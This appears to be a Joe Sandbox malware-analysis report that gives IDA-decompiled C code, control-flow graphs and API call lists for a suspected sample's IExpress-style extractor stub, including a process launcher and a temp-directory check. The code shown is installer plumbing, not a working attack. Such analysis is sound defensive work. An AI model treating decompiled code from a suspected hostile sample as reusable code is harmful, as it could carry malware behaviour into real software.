                                                                                                                                                                                                        control_flow_graph 577 1f6a60-1f6a91 call 1f7155 call 1f7208 GetStartupInfoW 583 1f6a93-1f6aa2 577->583 584 1f6abc-1f6abe 583->584 585 1f6aa4-1f6aa6 583->585 588 1f6abf-1f6ac5 584->588 586 1f6aaf-1f6aba Sleep 585->586 587 1f6aa8-1f6aad 585->587 586->583 587->588 589 1f6ac7-1f6acf _amsg_exit 588->589 590 1f6ad1-1f6ad7 588->590 591 1f6b0b-1f6b11 589->591 592 1f6ad9-1f6ae9 call 1f6c3f 590->592 593 1f6b05 590->593 595 1f6b2e-1f6b30 591->595 596 1f6b13-1f6b24 _initterm 591->596 597 1f6aee-1f6af2 592->597 593->591 598 1f6b3b-1f6b42 595->598 599 1f6b32-1f6b39 595->599 596->595 597->591 600 1f6af4-1f6b00 597->600 601 1f6b67-1f6b71 598->601 602 1f6b44-1f6b51 call 1f7060 598->602 599->598 604 1f6c39-1f6c3e call 1f724d 600->604 603 1f6b74-1f6b79 601->603 602->601 615 1f6b53-1f6b65 602->615 606 1f6b7b-1f6b7d 603->606 607 1f6bc5-1f6bc8 603->607 612 1f6b7f-1f6b81 606->612 613 1f6b94-1f6b98 606->613 610 1f6bca-1f6bd3 607->610 611 1f6bd6-1f6be3 _ismbblead 607->611 610->611 616 1f6be9-1f6bed 611->616 617 1f6be5-1f6be6 611->617 612->607 618 1f6b83-1f6b85 612->618 619 1f6b9a-1f6b9e 613->619 620 1f6ba0-1f6ba2 613->620 615->601 616->603 622 1f6c1e-1f6c25 616->622 617->616 618->613 623 1f6b87-1f6b8a 618->623 624 1f6ba3-1f6bbc call 1f2bfb 619->624 620->624 625 1f6c27-1f6c2d _cexit 622->625 626 1f6c32 622->626 623->613 627 1f6b8c-1f6b92 623->627 624->622 630 1f6bbe-1f6bbf exit 624->630 625->626 626->604 627->618 630->607
                                                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int* _t25;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed char _t41;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E001F7155();
                                                                                                                                                                                                        				_push(0x58);
                                                                                                                                                                                                        				_push(0x1f72b8);
                                                                                                                                                                                                        				E001F7208(__ebx, __edi, __esi);
                                                                                                                                                                                                        				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                        				_t53 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                        					if(0 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(0 != _t56) {
                                                                                                                                                                                                        						Sleep(0x3e8);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t58 = 1;
                                                                                                                                                                                                        						_t53 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_t67 =  *0x1f88b0 - _t58; // 0x2
                                                                                                                                                                                                        					if(_t67 != 0) {
                                                                                                                                                                                                        						__eflags =  *0x1f88b0; // 0x2
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							 *0x1f81e4 = _t58;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0x1f88b0 = _t58;
                                                                                                                                                                                                        							_t37 = E001F6C3F(0x1f10b8, 0x1f10c4); // executed
                                                                                                                                                                                                        							__eflags = _t37;
                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                        								goto L13;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        								_t30 = 0xff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(0x1f);
                                                                                                                                                                                                        						L001F6FF4();
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t68 =  *0x1f88b0 - _t58; // 0x2
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_push(0x1f10b4);
                                                                                                                                                                                                        							_push(0x1f10ac);
                                                                                                                                                                                                        							L001F7202();
                                                                                                                                                                                                        							 *0x1f88b0 = 2;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(_t53 == 0) {
                                                                                                                                                                                                        							 *0x1f88ac = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t71 =  *0x1f88b4;
                                                                                                                                                                                                        						if( *0x1f88b4 != 0 && E001F7060(_t71, 0x1f88b4) != 0) {
                                                                                                                                                                                                        							_t60 =  *0x1f88b4; // 0x0
                                                                                                                                                                                                        							 *0x1fa288(0, 2, 0);
                                                                                                                                                                                                        							 *_t60();
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                        						_t59 =  *_t25;
                                                                                                                                                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t41 =  *_t59;
                                                                                                                                                                                                        							if(_t41 > 0x20) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							if(_t41 != 0) {
                                                                                                                                                                                                        								if(_t54 != 0) {
                                                                                                                                                                                                        									goto L32;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                        										_t59 = _t59 + 1;
                                                                                                                                                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        										_t41 =  *_t59;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t29 = 0xa;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(_t29);
                                                                                                                                                                                                        							_t30 = E001F2BFB(0x1f0000, 0, _t59); // executed
                                                                                                                                                                                                        							 *0x1f81e0 = _t30;
                                                                                                                                                                                                        							__eflags =  *0x1f81f8;
                                                                                                                                                                                                        							if( *0x1f81f8 == 0) {
                                                                                                                                                                                                        								exit(_t30); // executed
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *0x1f81e4;
                                                                                                                                                                                                        							if( *0x1f81e4 == 0) {
                                                                                                                                                                                                        								__imp___cexit();
                                                                                                                                                                                                        								_t30 =  *0x1f81e0; // 0x80070002
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        							goto L40;
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							__eflags = _t41 - 0x22;
                                                                                                                                                                                                        							if(_t41 == 0x22) {
                                                                                                                                                                                                        								__eflags = _t54;
                                                                                                                                                                                                        								_t15 = _t54 == 0;
                                                                                                                                                                                                        								__eflags = _t15;
                                                                                                                                                                                                        								_t54 = 0 | _t15;
                                                                                                                                                                                                        								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                        							__imp___ismbblead(_t26);
                                                                                                                                                                                                        							__eflags = _t26;
                                                                                                                                                                                                        							if(_t26 != 0) {
                                                                                                                                                                                                        								_t59 = _t59 + 1;
                                                                                                                                                                                                        								__eflags = _t59;
                                                                                                                                                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t59 = _t59 + 1;
                                                                                                                                                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L40:
                                                                                                                                                                                                        					return E001F724D(_t30);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t58 = 1;
                                                                                                                                                                                                        				__eflags = 1;
                                                                                                                                                                                                        				goto L7;
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001F7182
                                                                                                                                                                                                          • Part of subcall function 001F7155: GetCurrentProcessId.KERNEL32 ref: 001F7191
                                                                                                                                                                                                          • Part of subcall function 001F7155: GetCurrentThreadId.KERNEL32 ref: 001F719A
                                                                                                                                                                                                          • Part of subcall function 001F7155: GetTickCount.KERNEL32 ref: 001F71A3
                                                                                                                                                                                                          • Part of subcall function 001F7155: QueryPerformanceCounter.KERNEL32(?), ref: 001F71B8
                                                                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,001F72B8,00000058), ref: 001F6A7F
                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 001F6AB4
                                                                                                                                                                                                        • _amsg_exit.MSVCRT ref: 001F6AC9
                                                                                                                                                                                                        • _initterm.MSVCRT ref: 001F6B1D
                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 001F6B49
                                                                                                                                                                                                        • exit.KERNELBASE ref: 001F6BBF
                                                                                                                                                                                                        • _ismbblead.MSVCRT ref: 001F6BDA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836923961-0
                                                                                                                                                                                                        • Opcode ID: 07a5144c6cf5692d6d62b6ef45de3278a00762c85b16c4f9d50d49799a1dfce5
                                                                                                                                                                                                        • Instruction ID: 400bb6ddfce609b3de1e74c3d9db1ea8a22a1785ddaa5b1c336713cd33ed4634
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07a5144c6cf5692d6d62b6ef45de3278a00762c85b16c4f9d50d49799a1dfce5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F41DE71A4832DDFDB259B68DC1577A77A0BB44760F68012AEB46E36D0CF744881CB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 631 1f58c8-1f58d5 632 1f58d8-1f58dd 631->632 632->632 633 1f58df-1f58f1 LocalAlloc 632->633 634 1f5919-1f5959 call 1f1680 call 1f658a CreateFileA LocalFree 633->634 635 1f58f3-1f5901 call 1f44b9 633->635 638 1f5906-1f5910 call 1f6285 634->638 644 1f595b-1f596c CloseHandle GetFileAttributesA 634->644 635->638 645 1f5912-1f5918 638->645 644->638 646 1f596e-1f5970 644->646 646->638 647 1f5972-1f597b 646->647 647->645
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E001F58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				signed char _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                                                        				CHAR* _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t27 = __ecx;
                                                                                                                                                                                                        				_t23 = __ecx + 1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t6 =  *_t27;
                                                                                                                                                                                                        					_t27 = _t27 + 1;
                                                                                                                                                                                                        				} while (_t6 != 0);
                                                                                                                                                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                                        					E001F1680(_t20, _t36, _t33);
                                                                                                                                                                                                        					E001F658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                        					_v8 = _t10;
                                                                                                                                                                                                        					LocalFree(_t20);
                                                                                                                                                                                                        					_t12 = _v8;
                                                                                                                                                                                                        					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						CloseHandle(_t12);
                                                                                                                                                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0x1f9124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E001F44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        					_t14 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t14;
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,001F5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F58E7
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,001F5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F5943
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,001F5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F594D
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,001F5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F595C
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,001F5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F5963
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                                                                                                                                                                        • API String ID: 747627703-394614654
                                                                                                                                                                                                        • Opcode ID: 76484a29658772adbfc8f7a00629ec6fc43b02ba0daef3763356bbaad3a50aaf
                                                                                                                                                                                                        • Instruction ID: 1e441186a599603f649268efadbec812bac332ae4f16a88d602b65f832eac625
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76484a29658772adbfc8f7a00629ec6fc43b02ba0daef3763356bbaad3a50aaf
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C011E6B1600218ABC7245F7AAC4DBBB7F9AEF86374B104615B719D31D1CBB49845C6A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 675 1f3fef-1f4010 676 1f410a-1f411a call 1f6ce0 675->676 677 1f4016-1f403b CreateProcessA 675->677 678 1f40c4-1f4101 call 1f6285 GetLastError FormatMessageA call 1f44b9 677->678 679 1f4041-1f406e WaitForSingleObject GetExitCodeProcess 677->679 693 1f4106 678->693 682 1f4091 call 1f411b 679->682 683 1f4070-1f4077 679->683 688 1f4096-1f40b8 CloseHandle * 2 682->688 683->682 687 1f4079-1f407b 683->687 687->682 690 1f407d-1f4089 687->690 691 1f40ba-1f40c0 688->691 692 1f4108 688->692 690->682 694 1f408b 690->694 691->692 695 1f40c2 691->695 692->676 693->692 694->682 695->693
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E001F3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                                        				long _v528;
                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t20;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				int _t25;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t45 = __edx;
                                                                                                                                                                                                        				_t20 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                        				_t39 = __ecx;
                                                                                                                                                                                                        				_t49 = 1;
                                                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                                                        				if(__ecx == 0) {
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return E001F6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                                                        					 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                        					_t45 = 0x4c4;
                                                                                                                                                                                                        					E001F44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					_t49 = 0;
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t22 = _t49;
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                        				_t44 = _v528;
                                                                                                                                                                                                        				_t53 =  *0x1f8a28; // 0x0
                                                                                                                                                                                                        				if(_t53 == 0) {
                                                                                                                                                                                                        					_t34 =  *0x1f9a2c; // 0x0
                                                                                                                                                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                        						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                        							 *0x1f9a2c = _t44;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E001F411B(_t34, _t44);
                                                                                                                                                                                                        				CloseHandle(_v544.hThread);
                                                                                                                                                                                                        				CloseHandle(_v544);
                                                                                                                                                                                                        				if(( *0x1f9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE ref: 001F4033
                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001F4049
                                                                                                                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 001F405C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 001F409C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 001F40A8
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 001F40DC
                                                                                                                                                                                                        • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 001F40E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3183975587-0
                                                                                                                                                                                                        • Opcode ID: 67a6a9737e8ebf767127456787c998cd8681e565c2c982e05d54182bc8bfb055
                                                                                                                                                                                                        • Instruction ID: 09355e354546dae88dd03a58490d6c01fb268f4c4ce6f4ec3fa434fd03c4ec38
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67a6a9737e8ebf767127456787c998cd8681e565c2c982e05d54182bc8bfb055
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D431BF7164421CABEB209F65DC49FBB777CEBA4710F2001A9FA09E26A1CB345DC5CB21
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F51E5(void* __eflags) {
                                                                                                                                                                                                        				int _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = E001F468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                                                        					if(E001F468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                        						if(_t5 != 0) {
                                                                                                                                                                                                        							_t6 = E001F44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                        							LocalFree(_t28);
                                                                                                                                                                                                        							if(_t6 != 6) {
                                                                                                                                                                                                        								 *0x1f9124 = 0x800704c7;
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								return 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *0x1f9124 = 0;
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t28);
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E001F44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree(_t28);
                                                                                                                                                                                                        					 *0x1f9124 = 0x80070714;
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E001F44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        				goto L10;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46A0
                                                                                                                                                                                                          • Part of subcall function 001F468F: SizeofResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46A9
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46C3
                                                                                                                                                                                                          • Part of subcall function 001F468F: LoadResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46CC
                                                                                                                                                                                                          • Part of subcall function 001F468F: LockResource.KERNEL32(00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46D3
                                                                                                                                                                                                          • Part of subcall function 001F468F: memcpy_s.MSVCRT ref: 001F46E5
                                                                                                                                                                                                          • Part of subcall function 001F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,001F2F4D,?,00000002,00000000), ref: 001F5201
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 001F5250
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                          • Part of subcall function 001F6285: GetLastError.KERNEL32(001F5BBC), ref: 001F6285
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
